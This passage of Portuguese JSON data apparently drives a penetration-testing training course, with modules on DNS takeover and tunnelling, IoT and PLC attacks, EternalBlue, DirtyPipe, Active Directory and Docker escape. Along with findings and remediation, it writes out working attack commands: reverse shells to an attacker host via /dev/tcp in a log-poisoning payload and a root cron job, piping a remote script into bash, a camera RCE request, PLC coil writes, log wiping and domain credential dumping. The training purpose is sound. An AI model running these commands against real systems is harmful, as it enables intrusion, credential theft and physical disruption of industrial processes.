órfão)","Provar exfiltração via tunelamento DNS","Avaliar resolver recursivo aberto / DNSSEC"],"prerequisites":["Controle de um nameserver autoritativo","Conta no provedor (S3, GitHub Pages, Heroku) para reivindicar takeover"],"toolset":["subjack","subzy","dnsx","iodine","dnscat2","dnstwist","dig"],"mitre":[{"tactic":"Resource Development","technique":"Domain Takeover","id":"T1584.001"},{"tactic":"Command and Control","technique":"Application Layer Protocol: DNS","id":"T1071.004"},{"tactic":"Exfiltration","technique":"Exfiltration Over Alternative Protocol","id":"T1048"}],"steps":[{"id":"enum","kind":"recon","title":"1. Enumerar CNAMEs órfãos","goal":"Identificar registros CNAME apontando para recursos não reivindicados.","commands":[{"tool":"dnsx","command":"cat subs.txt | dnsx -cname -resp -silent"},{"tool":"subzy","command":"subzy run --targets subs.txt --concurrency 30 --hide_fails","expected":"Subdomínios apontando para s3, github.io, herokuapp, azurewebsites... com status \"VULNERABLE\"."}],"decision":{"question":"Achou CNAME para bucket S3 inexistente. Como provar takeover?","options":[{"id":"criar","label":"Criar bucket com o mesmo nome e hostear PoC HTML","consequence":"Prova clara, baixo impacto. Recomendado.","recommended":true},{"id":"pixel","label":"Hostear pixel de tracking em login.alvo.com.br","consequence":"Captura de cookies de sessão de usuários reais — alto impacto, cuidado com escopo."}]}},{"id":"rebinding","kind":"exploit","title":"2. DNS Rebinding contra serviços internos","goal":"Acessar serviços localhost/RFC1918 via JavaScript no browser de uma vítima.","commands":[{"tool":"whonow / Singularity","command":"docker run --rm -p 53:53/udp -p 80:80 nccgroup/singularity\n# Configurar DNS A record TTL=0 alternando entre IP atacante e 127.0.0.1"}]},{"id":"tunnel","kind":"exfil","title":"3. Tunelamento DNS para exfiltração","goal":"Estabelecer canal C2 ou exfiltrar dados via DNS quando portas estão bloqueadas.","commands":[{"tool":"iodine (server)","command":"iodined -f -c -P senha 10.0.0.1 tunnel.attacker.tld"},{"tool":"iodine (client)","command":"iodine -f -P senha tunnel.attacker.tld","expected":"Interface dns0 estabelecida; ssh -o ProxyCommand pelo túnel."},{"tool":"dnscat2","command":"dnscat2-server tunnel.attacker.tld\n# cliente: ./dnscat2 tunnel.attacker.tld"}],"evidence":["PoC HTML hospedada em subdomínio reivindicado","Captura de pacotes mostrando query DNS exfiltrando dados base32","Logs do server iodine com sessão ativa"]}],"report":[{"finding":"Subdomain takeover em assets.alvo.com.br","severity":"alta","description":"CNAME aponta para bucket S3 alvo-assets-prod.s3.amazonaws.com que foi deletado em 2023, permitindo reivindicação.","impact":"Atacante hospeda conteúdo arbitrário (incluindo phishing/malware) sob o domínio confiável da empresa.","remediation":["Auditar todos os CNAMEs e remover registros órfãos","Adotar processo de offboarding que inclui remoção de DNS records","Monitorar com ferramentas como subzy semanalmente em CI"]},{"finding":"Resolver recursivo público sem rate-limit","severity":"media","description":"O servidor 200.x.y.z responde queries recursivas para qualquer source IP, podendo ser usado em DDoS amplification.","impact":"A empresa pode ser usada como amplificador em ataques contra terceiros (responsabilidade legal).","remediation":["Restringir recursão a redes corporativas (allow-recursion {})","Habilitar Response Rate Limiting (RRL)","Considerar adoção de DNS over HTTPS internamente"]}],"legalNote":"Subdomain takeover via reivindicação de bucket é tecnicamente legítimo, mas hospedar conteúdo malicioso ou capturar dados de usuários sai do escopo educacional — pare na PoC."},{"id":"iot","groupId":"redes","title":"IoT / IIoT — Câmeras, PLCs e Smart Devices","shortTitle":"IoT / IIoT","summary":"Avaliação de dispositivos IoT (câmeras IP, smart locks) e IIoT (PLCs Modbus/S7) frequentemente expostos com firmware desatualizado e credenciais default.","difficulty":"intermediario","duration":"4-6h","objectives":["Descobrir dispositivos IoT na rede e na internet (Shodan)","Identificar credenciais default e firmware vulnerável","Extrair firmware e binwalk para encontrar segredos","Demonstrar comando arbitrário em PLC via Modbus/S7"],"prerequisites":["Acesso à rede OT/IoT autorizada","Hardware: USB-to-serial, JTAG opcional"],"toolset":["nmap","shodan","binwalk","firmware-mod-kit","mbtget","snap7","routersploit","mitmproxy"],"mitre":[{"tactic":"Initial Access","technique":"Exploit Public-Facing Application","id":"T1190"},{"tactic":"Discovery","technique":"Network Service Discovery","id":"T1046"},{"tactic":"Impact","technique":"Manipulation of Control","id":"T0831"}],"steps":[{"id":"discover","kind":"recon","title":"1. Descoberta de dispositivos IoT/IIoT","goal":"Mapear câmeras, PLCs, smart devices e protocolos industriais.","commands":[{"tool":"nmap (scripts ICS)","command":"nmap -p 502,102,44818,47808 --script modbus-discover,s7-info,enip-info 10.10.0.0/16"},{"tool":"shodan","command":"shodan search \"country:BR port:502 \\\"Schneider Electric\\\"\"\nshodan search \"country:BR Hikvision boa/0.94.14\""}]},{"id":"firmware","kind":"enum","title":"2. Extração e análise de firmware","goal":"Baixar firmware do site do fabricante e extrair filesystem.","commands":[{"tool":"binwalk","command":"binwalk -Me firmware.bin\ncd _firmware.bin.extracted/squashfs-root && grep -r \"password\" etc/"},{"tool":"firmwalker","command":"./firmwalker.sh _firmware.bin.extracted/squashfs-root","expected":"Lista hardcoded creds, chaves SSH privadas, URLs de cloud, certificados."}]},{"id":"cred","kind":"exploit","title":"3. Credenciais default + RCE em câmera Hikvision","goal":"Validar acesso admin/12345 e CVE-2021-36260.","commands":[{"tool":"curl (CVE-2021-36260)","command":"curl -k \"https://camera.alvo/SDK/webLanguage\" -X PUT -d '$(id)'","expected":"Output do comando id executado como root."}],"decision":{"question":"Achou PLC Schneider Modicon. Validar escrita?","options":[{"id":"leitura","label":"Apenas leitura (FC03 read holding registers)","consequence":"OPSEC máximo, sem risco de impacto operacional.","recommended":true},{"id":"escrita","label":"Escrita em coil de teste pré-acordada","consequence":"Prova impacto mas exige autorização explícita do engenheiro de processo."}]}},{"id":"plc","kind":"exploit","title":"4. Modbus — leitura e escrita","goal":"Demonstrar leitura de registers e escrita controlada.","commands":[{"tool":"mbtget","command":"mbtget -r3 -a 100 -n 10 10.10.50.5\nmbtget -w5 1 -a 200 10.10.50.5 # write coil 200 = ON"},{"tool":"snap7 (S7 PLC)","command":"python3 -c \"import snap7; c=snap7.client.Client(); c.connect('10.10.50.6',0,1); print(c.get_cpu_info())\""}],"evidence":["Screenshot do dump de firmware com hardcoded creds","PoC RCE em câmera com output do comando","Captura Modbus mostrando FC03/FC05 bem-sucedido"]}],"report":[{"finding":"PLC Modbus exposto na rede corporativa sem autenticação","severity":"critica","description":"O PLC Schneider Modicon M340 (10.10.50.5) responde a comandos Modbus de qualquer host na rede 10.10.0.0/16, incluindo escrita em coils.","impact":"Atacante na rede corporativa pode parar processos industriais, causando perda de produção e risco à segurança física.","remediation":["Segmentar OT em zona Purdue Level 2 atrás de firewall industrial (Tofino/Hirschmann)","Implementar Modbus TCP com VPN IPsec entre HMI e PLCs","Migrar para PLCs com autenticação (OPC-UA com X.509)"]},{"finding":"Câmeras Hikvision com CVE-2021-36260 (RCE não autenticado)","severity":"critica","description":"47 câmeras Hikvision com firmware ≤ 5.5.131 são exploráveis via injeção XML em /SDK/webLanguage.","impact":"RCE como root permite pivot para rede interna, captura de áudio/vídeo, persistência via firmware modificado.","remediation":["Atualizar firmware para versão ≥ 5.7.1","Isolar câmeras em VLAN dedicada sem rota para corporativa","Trocar credenciais default e desativar UPnP"],"references":["CVE-2021-36260","https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html"]}],"legalNote":"NUNCA execute escrita em PLCs/HMIs em produção sem autorização do engenheiro de processo e janela de manutenção. Falhas em IIoT podem causar danos físicos e mortes."},{"id":"windows-eternalblue","groupId":"servidores","title":"Windows Server — EternalBlue (MS17-010) e Pivot SMB","shortTitle":"Windows / EternalBlue","summary":"Exploração da vulnerabilidade MS17-010 (EternalBlue) em servidores Windows desatualizados, escalada via SeImpersonatePrivilege e pivot SMB para Domain Controllers.","difficulty":"intermediario","duration":"3-4h","objectives":["Identificar hosts vulneráveis a MS17-010","Obter SYSTEM via EternalBlue","Extrair hashes da SAM e do LSASS","Pivotar via SMB para outros hosts (pass-the-hash)"],"prerequisites":["Acesso à rede interna autorizada","Lab isolado se for produção (snapshot reversível)"],"toolset":["nmap","metasploit","impacket-smbclient","mimikatz","crackmapexec","evil-winrm"],"mitre":[{"tactic":"Initial Access","technique":"Exploit Public-Facing Application","id":"T1190"},{"tactic":"Execution","technique":"Exploitation for Client Execution","id":"T1203"},{"tactic":"Lateral Movement","technique":"Pass the Hash","id":"T1550.002"}],"steps":[{"id":"scan","kind":"recon","title":"1. Identificar hosts vulneráveis","goal":"Encontrar SMBv1 com MS17-010 não corrigido.","commands":[{"tool":"nmap","command":"nmap -p445 --script smb-vuln-ms17-010 10.10.10.0/24","expected":"VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers"},{"tool":"crackmapexec","command":"crackmapexec smb 10.10.10.0/24 -M ms17-010"}]},{"id":"exploit","kind":"exploit","title":"2. EternalBlue — execução remota como SYSTEM","goal":"Obter shell SYSTEM no alvo.","commands":[{"tool":"metasploit","command":"msfconsole -q\nuse exploit/windows/smb/ms17_010_eternalblue\nset RHOSTS 10.10.10.45\nset payload windows/x64/meterpreter/reverse_tcp\nset LHOST 10.10.10.99\nrun","expected":"meterpreter > getuid → NT AUTHORITY\\SYSTEM"}],"decision":{"question":"EternalBlue costuma travar a máquina (BSOD). Como mitigar risco?","options":[{"id":"lab","label":"Validar primeiro em snapshot/clone do servidor","consequence":"Garante reversibilidade. Recomendado.","recommended":true},{"id":"modulo-seguro","label":"Usar módulo \"auxiliary/scanner/smb/smb_ms17_010\" (apenas check)","consequence":"Sem RCE, apenas confirmação. Útil para evidência sem quebrar nada."}]}},{"id":"creds","kind":"privesc","title":"3. Extração de hashes e credenciais","goal":"Coletar hashes locais e do LSASS.","commands":[{"tool":"meterpreter","command":"load kiwi\ncreds_all\nhashdump","expected":"NTLM hashes da SAM + credenciais em memória (Kerberos tickets, LM/NTLM)."},{"tool":"mimikatz (standalone)","command":"privilege::debug\nsekurlsa::logonpasswords\nlsadump::sam"}]},{"id":"pivot","kind":"lateral","title":"4. Pass-the-Hash para outros hosts","goal":"Reutilizar hash do administrador local em outros Windows.","commands":[{"tool":"crackmapexec","command":"crackmapexec smb 10.10.10.0/24 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --local-auth","expected":"Lista hosts onde o hash autentica como Pwn3d!"},{"tool":"evil-winrm (PtH)","command":"evil-winrm -i 10.10.10.50 -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0"}],"evidence":["Output do nmap com hosts vulneráveis","Screenshot meterpreter SYSTEM + getuid","Lista de hashes extraídos (anonimizada no relatório)","Output crackmapexec mostrando hosts comprometidos por PtH"]}],"report":[{"finding":"MS17-010 (EternalBlue) não corrigido em 8 servidores","severity":"critica","cvss":"8.1 v3.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)","description":"Servidores Windows Server 2008 R2 / 2012 ainda vulneráveis a MS17-010, divulgada em 2017 e usada por WannaCry/NotPetya.","impact":"Comprometimento total da rede em < 5 minutos. Movimento lateral trivial. Risco de ransomware massivo.","remediation":["Aplicar KB4012212 (Win 7/2008) ou KB4012213 (Win 8.1/2012R2) imediatamente","Desabilitar SMBv1 globalmente: Set-SmbServerConfiguration -EnableSMB1Protocol $false","Bloquear porta 445 entre VLANs com firewall","Considerar substituição de servidores out-of-support por versões modernas"],"references":["CVE-2017-0144","MS17-010","https://docs.microsoft.com/security-updates/SecurityBulletins/2017/ms17-010"]},{"finding":"Reutilização de senha de Administrador local","severity":"critica","description":"A mesma senha (e portanto o mesmo hash NTLM) de Administrador local é usada em 47 estações e 12 servidores.","impact":"Comprometimento de 1 host = comprometimento de 60+ hosts via Pass-the-Hash.","remediation":["Implantar Microsoft LAPS (Local Administrator Password Solution)","Habilitar UAC remote restriction (LocalAccountTokenFilterPolicy)","Migrar para autenticação por Kerberos com contas dedicadas"]}],"legalNote":"EternalBlue pode causar BSOD e perda de dados. Sempre coordenar janela de manutenção e ter backup recente. Para produção, prefira o módulo de check apenas."},{"id":"linux-dirtypipe","groupId":"servidores","title":"Linux — DirtyPipe (CVE-2022-0847) e Privilege Escalation","shortTitle":"Linux / DirtyPipe","summary":"Escalada de privilégios local em kernels Linux 5.8 a 5.16.10 via DirtyPipe, partindo de shell de aplicação web vulnerável até root e persistência.","difficulty":"intermediario","duration":"2-4h","objectives":["Obter shell inicial via webapp vulnerável","Identificar kernel e enumerar vetores de privesc","Explorar DirtyPipe para sobrescrever arquivos privilegiados","Estabelecer persistência discreta"],"prerequisites":["Acesso a host Linux com kernel 5.8–5.16.10","Lab isolado"],"toolset":["linpeas","pspy","gtfobins","dirtypipe-exploits","nc","socat"],"mitre":[{"tactic":"Privilege Escalation","technique":"Exploitation for Privilege Escalation","id":"T1068"},{"tactic":"Persistence","technique":"Account Manipulation","id":"T1098"},{"tactic":"Discovery","technique":"System Information Discovery","id":"T1082"}],"steps":[{"id":"foothold","kind":"exploit","title":"1. Foothold via SSRF + LFI em webapp","goal":"Obter shell de baixo privilégio (www-data).","commands":[{"tool":"curl (LFI → log poisoning)","command":"curl \"http://alvo/index.php?file=../../../var/log/apache2/access.log\" -A \"\"\ncurl \"http://alvo/index.php?file=../../../var/log/apache2/access.log&c=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.0.1%2F4444%200%3E%261\""}]},{"id":"enum","kind":"enum","title":"2. Enumeração local","goal":"Identificar kernel, SUID, jobs cron e senhas em config files.","commands":[{"tool":"uname / linpeas","command":"uname -a # Linux 5.13.0-30-generic\ncurl http://10.0.0.1/linpeas.sh | bash | tee linpeas.out","expected":"Kernel 5.13 → vulnerável a DirtyPipe (CVE-2022-0847)."},{"tool":"pspy","command":"./pspy64 -pf -i 1000"}],"decision":{"question":"Há múltiplos vetores de privesc. Qual usar primeiro?","options":[{"id":"dirtypipe","label":"DirtyPipe — sobrescrever /etc/passwd ou SUID","consequence":"Confiável, sem dependências. Recomendado.","recommended":true},{"id":"sudo","label":"sudo CVE-2021-3156 (Baron Samedit)","consequence":"Funciona se sudo < 1.9.5p2; pode crashar daemon."},{"id":"cron","label":"Sequestrar cron job que executa script writable","consequence":"Lento (precisa esperar próximo tick) mas extremamente OPSEC."}]}},{"id":"dirtypipe","kind":"privesc","title":"3. Exploit DirtyPipe","goal":"Escrever em /etc/passwd para tornar uma conta UID 0.","commands":[{"tool":"gcc + exploit","command":"gcc dirtypipe.c -o dp\n./dp /etc/passwd 1 \\$(printf \"root2:\\\\$1\\\\$abc\\\\$KQfYwBNvoyyDRkPMhQYIz0:0:0:root:/root:/bin/bash\\n\")\nsu root2","expected":"Acesso root via su root2."},{"tool":"exploit alternativo (SUID hijack)","command":"# Sobrescrever /usr/bin/sudo com payload reverse shell SUID\n./dp /usr/bin/sudo 1 \"$(cat shellcode.bin)\""}]},{"id":"persist","kind":"post","title":"4. Persistência e cleanup","goal":"Manter acesso discreto e remover IOCs do ataque.","commands":[{"tool":"cron de root","command":"echo \"* * * * * root bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'\" >> /etc/cron.d/apt-update"},{"tool":"cleanup logs","command":"truncate -s0 /var/log/apache2/access.log\nhistory -c && unset HISTFILE"}],"evidence":["Output uname -a","whoami antes (www-data) e depois (root)","Hash do binário modificado (antes/depois)"]}],"report":[{"finding":"Kernel Linux vulnerável a CVE-2022-0847 (DirtyPipe)","severity":"alta","cvss":"7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)","description":"Servidores rodam kernel 5.13.0-30 que permite a qualquer usuário local escrever em arquivos read-only (incluindo /etc/passwd e binários SUID).","impact":"Privilege escalation trivial de qualquer shell de aplicação para root.","remediation":["Atualizar kernel para 5.16.11+ / 5.15.25+ / 5.10.102+ ou superior","Aplicar política seccomp em workloads de aplicação","Auditar shells abertos em containers (read-only rootfs quando possível)"],"references":["CVE-2022-0847","https://dirtypipe.cm4all.com/"]},{"finding":"Webapp PHP vulnerável a LFI com log poisoning","severity":"critica","description":"O parâmetro file de index.php não valida path traversal; logs do Apache são acessíveis e gravam User-Agent sem sanitização.","impact":"RCE não autenticado como www-data, ponto de entrada para todo o restante da kill chain.","remediation":["Validar input com whitelist (basename + diretório fixo)","Mover webapp para PHP 8 com open_basedir restritivo","Habilitar AppArmor/SELinux para Apache"]}],"legalNote":"Modificar /etc/passwd e binários SUID em produção pode causar lockout de administradores legítimos. Sempre coordenar e ter console out-of-band disponível."},{"id":"active-directory","groupId":"servidores","title":"Active Directory — Kerberoasting, AS-REP, ADCS e DCSync","shortTitle":"Active Directory","summary":"Kill chain completa contra Active Directory: enumeração com BloodHound, Kerberoasting, AS-REP roasting, abuso de ADCS (ESC1/ESC8) e DCSync para Domain Admin.","difficulty":"avancado","duration":"6-8h","objectives":["Enumerar AD via BloodHound e LDAP","Kerberoast contas de serviço","AS-REP roast contas sem pre-auth","Abusar de templates ADCS vulneráveis (ESC1/ESC8)","Executar DCSync e dumpar NTDS.dit"],"prerequisites":["Credenciais de usuário de domínio low-priv (mesmo guest)","Conexão à rede AD"],"toolset":["bloodhound-python","rubeus","impacket","certipy","crackmapexec","mimikatz","powerview"],"mitre":[{"tactic":"Credential Access","technique":"Steal or Forge Kerberos Tickets: Kerberoasting","id":"T1558.003"},{"tactic":"Credential Access","technique":"Steal or Forge Kerberos Tickets: AS-REP Roasting","id":"T1558.004"},{"tactic":"Credential Access","technique":"OS Credential Dumping: DCSync","id":"T1003.006"},{"tactic":"Privilege Escalation","technique":"Abuse Elevation Control Mechanism","id":"T1548"}],"steps":[{"id":"enum","kind":"enum","title":"1. Enumeração AD com BloodHound","goal":"Mapear ACLs, grupos e caminhos de ataque até Domain Admin.","commands":[{"tool":"bloodhound-python","command":"bloodhound-python -u alice -p Senha123 -d corp.local -ns 10.10.0.10 -c All --zip"},{"tool":"crackmapexec","command":"crackmapexec ldap 10.10.0.10 -u alice -p Senha123 --groups\ncrackmapexec smb 10.10.0.0/24 -u alice -p Senha123 --shares"}]},{"id":"kerberoast","kind":"exploit","title":"2. Kerberoasting","goal":"Solicitar TGS para contas com SPN e quebrar offline.","commands":[{"tool":"impacket-GetUserSPNs","command":"impacket-GetUserSPNs corp.local/alice:Senha123 -dc-ip 10.10.0.10 -request -outputfile spns.txt","expected":"Hashes $krb5tgs$23$* salvos em spns.txt."},{"tool":"hashcat","command":"hashcat -m 13100 spns.txt rockyou.txt -r rules/best64.rule"}],"decision":{"question":"BloodHound mostra que a conta SQLSvc tem GenericWrite no grupo Domain Admins. Próximo passo?","options":[{"id":"kerberoast","label":"Kerberoast SQLSvc primeiro","consequence":"Confirma se senha é fraca; se sim, ataque rápido.","recommended":true},{"id":"shadow-cred","label":"Shadow Credentials se tiver msDS-KeyCredentialLink writable","consequence":"Mais OPSEC, mas requer ambiente Windows 2016+."}]}},{"id":"asrep","kind":"exploit","title":"3. AS-REP Roasting","goal":"Quebrar senhas de contas com \"Do not require Kerberos pre-authentication\".","commands":[{"tool":"impacket-GetNPUsers","command":"impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.0.10 -outputfile asrep.txt"},{"tool":"hashcat","command":"hashcat -m 18200 asrep.txt rockyou.txt"}]},{"id":"adcs","kind":"privesc","title":"4. ADCS — ESC1 (template misconfigurada)","goal":"Solicitar certificado em nome de Domain Admin via template vulnerável.","commands":[{"tool":"certipy find","command":"certipy find -u alice@corp.local -p Senha123 -dc-ip 10.10.0.10 -vulnerable","expected":"Template \"WebServer\" marcada como ESC1 (Enrollee Supplies Subject)."},{"tool":"certipy req","command":"certipy req -u alice@corp.local -p Senha123 -ca CORP-CA -template WebServer -upn administrator@corp.local"},{"tool":"certipy auth","command":"certipy auth -pfx administrator.pfx -dc-ip 10.10.0.10","expected":"NT hash do administrator do domínio."}]},{"id":"dcsync","kind":"exfil","title":"5. DCSync — dump completo do AD","goal":"Replicar NTDS.dit usando privilégios DA.","commands":[{"tool":"impacket-secretsdump","command":"impacket-secretsdump corp.local/Administrator@10.10.0.10 -hashes :HASH_NTLM","expected":"Hashes NTLM de todas as contas + krbtgt para Golden Ticket."}],"evidence":["Grafo BloodHound do shortest path Alice → DA","Hashes Kerberoasted + senha quebrada","Certificado emitido como Administrator","Dump NTDS (anonimizado no relatório)"]}],"report":[{"finding":"Conta de serviço SQLSvc com SPN e senha fraca","severity":"critica","description":"A conta SQLSvc tem SPN registrado e senha \"Sql@2020\" (8 chars). Quebrada em 12 segundos com hashcat.","impact":"Acesso SYSTEM em todos os SQL Servers do domínio + caminho para DA via GenericWrite.","remediation":["Migrar para Group Managed Service Accounts (gMSA) com rotação automática","Onde gMSA não for possível, usar senhas ≥ 25 chars aleatórios","Auditar contas com SPN trimestralmente"]},{"finding":"Template ADCS \"WebServer\" vulnerável a ESC1","severity":"critica","description":"Template permite que qualquer usuário autenticado solicite cert com SAN arbitrário (Enrollee Supplies Subject + Client Authentication EKU).","impact":"Qualquer usuário do domínio se autentica como qualquer outro (incluindo DA) usando certificados.","remediation":["Desabilitar \"Supply in the request\" para subject name","Restringir Enrollment Permissions para grupos específicos","Habilitar Manager Approval para templates sensíveis","Auditar com Certipy regularmente"],"references":["https://posts.specterops.io/certified-pre-owned-d95910965cd2"]},{"finding":"Pre-authentication desabilitado em 4 contas","severity":"alta","description":"Contas com DONT_REQ_PREAUTH permitem AS-REP roasting offline sem autenticação.","impact":"Quebra offline de senhas sem gerar logs de falha de login.","remediation":["Remover flag DONT_REQ_PREAUTH em todas as contas","Migrar aplicações legadas para Kerberos moderno"]}],"legalNote":"DCSync e dump de NTDS expõem todas as senhas do domínio. Tratar dump como informação ultra-sensível: criptografar em repouso, eliminar após o relatório, e nunca usar credenciais reais para login fora do escopo.","liveSimulation":{"attackerLabel":"Pentester — Kali (alice/Senha123)","targetLabel":"Domain Controller — DC01.corp.local","attackerPrompt":"alice@kali","targetPrompt":"DC01","actions":[{"side":"attacker","kind":"cmd","text":"bloodhound-python -u alice -p Senha123 -d corp.local -ns 10.10.0.10 -c All --zip","delayMs":600,"explanation":{"title":"Enumeração do AD com BloodHound","body":"Com credenciais low-priv, o atacante coleta todos os objetos do AD via LDAP: usuários, grupos, ACLs, SPNs. Tudo que é \"readable by Authenticated Users\" por default.","mitre":"T1087.002"}},{"side":"target","kind":"log","text":"Event 4662: LDAP search by alice (base: DC=corp,DC=local, scope: subtree, 200k+ objects)","delayMs":900,"explanation":{"title":"DC registra o scan mas não alerta","body":"A query é ruidosa (200k+ objetos em poucos minutos), mas Event 4662 só sobe alerta se o SACL estiver configurado. Por padrão, não está.","mitre":"T1562.002"}},{"side":"attacker","kind":"output","text":"BloodHound: Shortest path alice → Domain Admins: 3 hops via SQLSvc (GenericWrite on DA group)","delayMs":1200,"explanation":{"title":"Caminho curto encontrado","body":"SQLSvc é uma conta de serviço com SPN (kerberoastable) E tem GenericWrite no grupo Domain Admins. Se quebrarmos a senha, adicionamos alice ao DA.","mitre":"T1069.002"}},{"side":"attacker","kind":"cmd","text":"impacket-GetUserSPNs corp.local/alice:Senha123 -request -outputfile spns.txt","delayMs":1000,"explanation":{"title":"Kerberoast: pedindo TGS para SQLSvc","body":"O atacante usa sua TGT normal pra pedir um Service Ticket (TGS) para a SPN do SQLSvc. O DC entrega — é comportamento normal do Kerberos.","mitre":"T1558.003"}},{"side":"target","kind":"event","text":"Event 4769: TGS issued for SPN MSSQLSvc/sql01.corp.local:1433 (user=alice)","delayMs":800,"explanation":{"title":"DC emite o TGS","body":"O DC loga o 4769 mas não bloqueia. Regra SIEM para kerberoast precisa olhar: RC4 + alto volume de TGS + contas com senha fraca. Raramente configurado.","mitre":"T1558.003"}},{"side":"attacker","kind":"output","text":"$$krb5tgs$23$*SQLSvc*corp.local*MSSQLSvc/sql01…$abc123…(RC4-HMAC hash)","delayMs":600,"explanation":{"title":"Hash recebido","body":"O TGS é encriptado com o NT hash da senha do SQLSvc. RC4 = quebra offline trivial em GPU."}},{"side":"attacker","kind":"cmd","text":"hashcat -m 13100 spns.txt rockyou.txt -r rules/best64.rule -w 3","delayMs":1400,"explanation":{"title":"Crack offline com GPU","body":"hashcat tenta bilhões de senhas por segundo em GPU. Se a senha do SQLSvc estiver em wordlist + regras, quebra em segundos.","mitre":"T1110.002"}},{"side":"attacker","kind":"alert","text":"CRACKED: SQLSvc password = \"Sql@2020\" (12s, RTX 3080)","delayMs":800,"explanation":{"title":"Senha fraca quebrada","body":"Contas de serviço tipicamente têm senhas fracas porque admins trocam raramente. Única defesa real: gMSA (senhas aleatórias rotacionadas pelo AD).","mitre":"M1041"}},{"side":"attacker","kind":"cmd","text":"impacket-addcomputer -computer-name \"PWND$\" -computer-pass \"P0wn3d!\" corp.local/SQLSvc:Sql@2020","delayMs":1200,"explanation":{"title":"Criando machine account","body":"Qualquer user autenticado pode criar até 10 computer accounts (ms-DS-MachineAccountQuota). Útil para próximos passos (shadow credentials, RBCD).","mitre":"T1098"}},{"side":"attacker","kind":"cmd","text":"certipy req -u alice@corp.local -p Senha123 -ca CORP-CA -template WebServer -upn administrator@corp.local","delayMs":1000,"explanation":{"title":"ADCS ESC1: pedindo cert como Administrator","body":"O template \"WebServer\" tem Enrollee Supplies Subject + Client Auth EKU — bug de configuração comum. Atacante especifica UPN do Administrator e o CA emite o cert.","mitre":"T1649"}},{"side":"target","kind":"event","text":"Event 4886 [ADCS]: Certificate issued — Template=WebServer, Subject=administrator@corp.local","delayMs":700,"explanation":{"title":"CA emite cert sem verificar","body":"O template permitiu que o subject fosse escolhido pelo requisitante — falha ESC1. O cert tem validade normal (1 ano) e pode autenticar como admin.","mitre":"T1649"}},{"side":"attacker","kind":"cmd","text":"certipy auth -pfx administrator.pfx -dc-ip 10.10.0.10","delayMs":1000,"explanation":{"title":"Autenticação via PKINIT","body":"O cert é usado para PKINIT — extensão do Kerberos. O DC emite TGT para administrator e retorna o NT hash da conta.","mitre":"T1550.003"}},{"side":"attacker","kind":"alert","text":"GOT: administrator NT hash = aad3b435b51404eeaad3b435b51404ee:1d78abc…","delayMs":600,"explanation":{"title":"Hash do admin obtido","body":"Com o NT hash do administrator (Pass-the-Hash), o atacante pode autenticar como DA em qualquer serviço do domínio.","mitre":"T1550.002"}},{"side":"attacker","kind":"cmd","text":"impacket-secretsdump corp.local/Administrator@10.10.0.10 -hashes :1d78abc…","delayMs":1200,"explanation":{"title":"DCSync: replicando NTDS.dit","body":"Com privilégio DS-Replication-Get-Changes, o atacante diz \"sou outro DC, me manda a base\". O DC entrega TODOS os hashes do domínio.","mitre":"T1003.006"}},{"side":"target","kind":"alert","text":"[SIEM] CRITICAL: DsGetNCChanges request from 10.10.0.99 (NOT a DC)","delayMs":900,"explanation":{"title":"SIEM finalmente acorda","body":"DCSync é detectável — a réplica veio de um IP que não é DC. Mas o atacante já tem TODOS os hashes incluindo krbtgt. Golden Ticket é possível agora.","mitre":"T1003.006"}},{"side":"attacker","kind":"output","text":"Dumped 12847 accounts including krbtgt:aad3b4…:8e1faf…","delayMs":700,"explanation":{"title":"Dump completo","body":"Todas as senhas do domínio (cacheadas no AD). Com o hash do krbtgt, o atacante pode forjar TGTs (Golden Ticket) que duram anos — mesmo rotacionando senhas."}},{"side":"attacker","kind":"event","text":"FIM. Tempo: 8 minutos de user low-priv → domain admin + NTDS dump.","delayMs":1200,"explanation":{"title":"Kill chain completa","body":"Defesa: gMSA no SQLSvc (remove kerberoast), templates ADCS sem \"Enrollee Supplies Subject\" (fecha ESC1), regras SIEM pra 4769/4624/4662/4886/DCSync. E rotação dupla do krbtgt trimestral.","mitre":"M1041"}}]}},{"id":"docker","groupId":"servidores","title":"Docker — Container Escape e Docker Socket Abuse","shortTitle":"Docker","summary":"Escape de container Docker via socket exposto, capabilities perigosas, mount do host e abuso de runC/CVE-2019-5736.","difficulty":"avancado","duration":"3-5h","objectives":["Identificar containers com configurações inseguras","Escapar via /var/run/docker.sock montado","Escapar via privileged: true / capabilities perigosas","Demonstrar runC overwrite (CVE-2019-5736)"],"prerequisites":["Shell em container alvo","Conhecimento de namespaces e cgroups"],"toolset":["docker","amicontained","deepce","kubectl","runc"],"mitre":[{"tactic":"Privilege Escalation","technique":"Escape to Host","id":"T1611"},{"tactic":"Initial Access","technique":"Exploit Public-Facing Application","id":"T1190"}],"steps":[{"id":"detect","kind":"enum","title":"1. Detectar contexto de container","goal":"Confirmar que está em container e mapear configurações.","commands":[{"tool":"amicontained","command":"/amicontained","expected":"Container Runtime: docker\nCapabilities: cap_sys_admin (PERIGOSO)\nSeccomp: disabled"},{"tool":"detection manual","command":"cat /proc/1/cgroup | grep docker\nls -la /.dockerenv\ncapsh --print"}]},{"id":"sock","kind":"privesc","title":"2. Docker socket montado → escape trivial","goal":"Usar socket para criar container privileged com host root.","commands":[{"tool":"docker (a partir do socket)","command":"ls -la /var/run/docker.sock\ndocker -H unix:///var/run/docker.sock run -v /:/host --rm -it alpine chroot /host /bin/bash","expected":"Shell root no host."}],"decision":{"question":"Não há docker.sock, mas o container é privileged. Como escapar?","options":[{"id":"cgroup","label":"Abuso de cgroup release_agent","consequence":"Funciona em containers com SYS_ADMIN. Confiável.","recommended":true},{"id":"mount-disk","label":"Mount do disco do host (/dev/sda1)","consequence":"Direto e óbvio em logs."}]}},{"id":"cgroup-escape","kind":"privesc","title":"3. Escape via cgroup notify_on_release (privileged, cgroup v1)","goal":"Executar comando no host via cgroup release_agent.","commands":[{"tool":"pré-check de cgroup","command":"stat -fc %T /sys/fs/cgroup/ # \"tmpfs\" = v1 (explorável), \"cgroup2fs\" = v2 (mitigado)\nmount | grep cgroup","notes":"IMPORTANTE: esta técnica funciona APENAS em cgroup v1 + container privileged. Kernels 